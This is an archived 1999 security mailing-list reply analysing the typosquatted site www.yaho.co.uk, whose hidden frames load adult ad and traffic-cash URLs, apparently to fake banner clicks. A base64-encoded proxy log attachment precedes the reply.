IGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206ODA4MC9pbWcvbmV0aGVybGFuZHMuZ2lmIEhU
VFAvMS4wIiAyMDAgMTA1NQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9G
ZWIvMTk5OToxODoxNzo1NCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29t
OjgwODAvaW1nL3BvcnR1Z2FsLmdpZiBIVFRQLzEuMCIgMjAwIDEyNzMNCnN1cHBvcnQuZ2VtaW5p
LXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6NTQgKzAwMDBdICJHRVQgaHR0
cDovL3d3dy5DYXNpbm9GYW50YXN5LmNvbTo4MDgwL2ltZy9zd2VlZGlzaC5naWYgSFRUUC8xLjAi
IDIwMCAxMDgzDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5
OjE4OjE3OjU0ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206ODA4MC9p
bWcvd2lubW9uZXkuZ2lmIEhUVFAvMS4wIiAyMDAgMzE2Nw0Kc3VwcG9ydC5nZW1pbmktcmVzZWFy
Y2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo1NCArMDAwMF0gIkdFVCBodHRwOi8vd3d3
LkNhc2lub0ZhbnRhc3kuY29tOjgwODAvaW1nL2l0YWxpYW4uZ2lmIEhUVFAvMS4wIiAyMDAgMTA2
Ng0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo1
NSArMDAwMF0gIkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29tOjgwODAvaW1nL2NoaXRl
eHQuZ2lmIEhUVFAvMS4wIiAyMDAgODkyDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAt
IC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjU2ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFu
dGFzeS5jb206ODA4MC9pbWcvYnV0dG9uc2UuZ2lmIEhUVFAvMS4wIiAyMDAgMzY0OQ0Kc3VwcG9y
dC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo1NiArMDAwMF0g
IkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29tOjgwODAvaW1nL2VudHJhbmNlaGVhZGVy
LmdpZiBIVFRQLzEuMCIgMjAwIDczMTkNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0g
LSBbMDgvRmViLzE5OTk6MTg6MTg6MDMgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50
YXN5LmNvbTo4MDgwL2ltZy9lbnRyYW5jZWdpcmwuZ2lmIEhUVFAvMS4wIiAyMDAgMTc3NTINCnN1
cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTg6MDUgKzAw
MDBdICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50YXN5LmNvbTo4MDgwL2ltZy9lbnRyYW5jZS5n
aWYgSFRUUC8xLjAiIDIwMCA1NjcwNQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAt
IFswOC9GZWIvMTk5OToxODoxODoxMCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNv
bS8gSFRUUC8xLjAiIDIwMCA1MjU1DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0g
WzA4L0ZlYi8xOTk5OjE4OjE4OjExICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuc3RhcnNhZHMuY29t
L2ltYWdlcy9iYXJyaWdodHllbC5naWYgSFRUUC8xLjAiIDIwMCA5MTgNCnN1cHBvcnQuZ2VtaW5p
LXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTg6MTIgKzAwMDBdICJHRVQgaHR0
cDovL3d3dy5zdGFyc2Fkcy5jb20vaW1hZ2VzL2JhcjExYi5naWYgSFRUUC8xLjAiIDIwMCA1MzUN
CnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTg6MTIg
KzAwMDBdICJHRVQgaHR0cDovL3d3dy5zdGFyc2Fkcy5jb20vaW1hZ2VzL2JhcnJpZ2h0LmdpZiBI
VFRQLzEuMCIgMjAwIDkxNQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9G
ZWIvMTk5OToxODoxODoxMiArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9pbWFn
ZXMvYmFyMTBiLmdpZiBIVFRQLzEuMCIgMjAwIDUzMg0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2gu
Y28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODoxMyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0
YXJzYWRzLmNvbS9jZ2ktYmluL3NlcnZlLmNnaT9JRD1OZXRzdGFycyBIVFRQLzEuMCIgMzAyIDI5
MQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODox
MyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9pbWFnZXMvbmV0c2NhcGU0Lmdp
ZiBIVFRQLzEuMCIgMjAwIDk4Ng0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFsw
OC9GZWIvMTk5OToxODoxODoxNCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9p
bWFnZXMvYmFyMTBhLmdpZiBIVFRQLzEuMCIgMjAwIDUyNg0Kc3VwcG9ydC5nZW1pbmktcmVzZWFy
Y2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODoxNCArMDAwMF0gIkdFVCBodHRwOi8vd3d3
LnN0YXJzYWRzLmNvbS9pbWFnZXMvYmFyMTFhLmdpZiBIVFRQLzEuMCIgMjAwIDUyNw0Kc3VwcG9y
dC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODoxNCArMDAwMF0g
IkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9pbWFnZXMvYmFyZG93bnllbC5naWYgSFRUUC8x
LjAiIDIwMCA5MTQNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5
OTk6MTg6MTg6MTUgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5zdGFyc2Fkcy5jb20vYXguY2dpP2xv
Z28uZ2lmIEhUVFAvMS4wIiAzMDIgMjYwDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAt
IC0gWzA4L0ZlYi8xOTk5OjE4OjE4OjE1ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuc3RhcnNhZHMu
Y29tL2Jhbm5lcnMvdXNhLmdpZiBIVFRQLzEuMCIgMjAwIDEwMzE2DQpzdXBwb3J0LmdlbWluaS1y
ZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE4OjE2ICswMDAwXSAiR0VUIGh0dHA6
Ly93d3cuc3RhcnNhZHMuY29tL2ltYWdlcy9iYXJkb3duLmdpZiBIVFRQLzEuMCIgMjAwIDkxNg0K
c3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODoxOCAr
MDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9pbWFnZXMvaWUzLmdpZiBIVFRQLzEu
MCIgMjAwIDExMTENCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5
OTk6MTg6MTg6MTkgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5zdGFyc2Fkcy5jb20vbG9nby5naWYg
SFRUUC8xLjAiIDIwMCA0MzgxDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4
L0ZlYi8xOTk5OjE4OjIwOjQ2ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cueWFob28uY28udWsvIEhU
VFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIv
MTk5OToxODoyMDo0NyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG9vLmNvLnVrL2ltYWdlcy91
a19tYWluNGMuZ2lmIEhUVFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28u
dWsgLSAtIFswOC9GZWIvMTk5OToxODoyMDo0NyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG9v
LmNvLnVrL2Fkdi9pbWFnZXMveWNsaWNrX3dvcmsyX2htcGdfdWsuZ2lmIEhUVFAvMS4wIiAzMDQg
LQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoyMDo0
NyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG9vLmNvLnVrL2ltYWdlcy9zbS5naWYgSFRUUC8x
LjAiIDMwNCAtDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5
OjE4OjIxOjA2ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cueWFob28uY29tLyBIVFRQLzEuMCIgMjAw
IDkyMTENCg==
--=_5A0DDE8C.57365AD0--
* Next message: Michael: "FakeBo 0.3.1 & nmap"
* Previous message: David LeBlanc: "Re: ISS Internet Scanner Cannot be
relied upon for conclusive"
* Next in thread: Paul McGovern: "Re: Spoofed Yahoo web site -
www.yaho.co.uk"
Re: Spoofed Yahoo web site - www.yaho.co.uk
Paul McGovern (isles@LAMER.NET)
Tue, 9 Feb 1999 17:49:00 -0500
* Messages sorted by: [ date ][ thread ][ subject ][ author ]
* Next message: Brandon S. Allbery: "Re: SSH 1.x and 2.x Daemon"
* Previous message: A. C. Eufemio: "Security Scanners and other Auditing
Tools [was Re: ISS Internet"
* In reply to: Paul Murphy: "Spoofed Yahoo web site - www.yaho.co.uk"
On Mon, 8 Feb 1999, Paul Murphy wrote:
| Hi,
|
| You might like to try this one on for size, and advise whether there's
| anything nasty going on behind this site.....
Going to this site in lynx, we're given a page with the following link on
it:
The requested URL probably is:
http://www.yahoo.co.uk
however, the link behind this is actually
http://www.aae.net/typo/typolink.shtml. Following this link takes you to a
page with one main frame (which has the actual link to
http://www.yahoo.co.uk) and 14 others, which under netscape for linux are
hidden. However, of course, lynx tells us where they go :> the sites they
lead to are:
http://199.217.203.16/stats.asp?sb5553
http://www.gaytradition.com/trafficcash/trafficcash.cgi?nutzw1
http://cgi2.hotshots.net/0/nutzw1
http://adultad.hotlynxxx.com/hotapi.wsa/GIF1852
http://ad.xxxteen.com/INDEX_2632.shtml
http://ad.xxxpic.com/adult/21/INDEX_2675.shtml
http://ad.xxxteen.com/INDEX_2709.shtml
http://ad.mpgworld.com/INDEX_2661.shtml
http://ad.xxxteen.com/indexmain.shtml
http://ad.xxxpic.com/adult/21/start.htm
http://ad.mpgworld.com/start.htm
with a couple of them repeated. Under netscape for linux, it automatically
refreshed my browser to www.yahoo.co.uk but watching the status bar i
could see netscape trying to look up all of these sites so I know it was
working in the background to connect to those sites. Pretty harmless,
looks to me like someone's little scheme to generate fake 'banner clicks,'
pretty lame but more original than spamming eh? Anyway, it doesn't look
like this has anything malicious like a session watcher behind it, just
someone's idea of making a little spare cash. Of course, I could be
wrong... this is all just speculation :> Regards,
-=--=--=--=--=--=--=--=--=--=--=--=--=--=-
Paul McGovern (nyisles) - isles@lamer.net
BSBW Public Library - Technical Assistant
Administrator - redemption.bc.ca.xnet.org
Administrator - krad.fef.net
http://www.krad.org (under construction)
-=--=--=--=--=--=--=--=--=--=--=--=--=--=-
* Next message: Brandon S. Allbery: "Re: SSH 1.x and 2.x Daemon"
* Previous message: A. C. Eufemio: "Security Scanners and other Auditing
Tools [was Re: ISS Internet"
* In reply to: Paul Murphy: "Spoofed Yahoo web site - www.yaho.co.uk"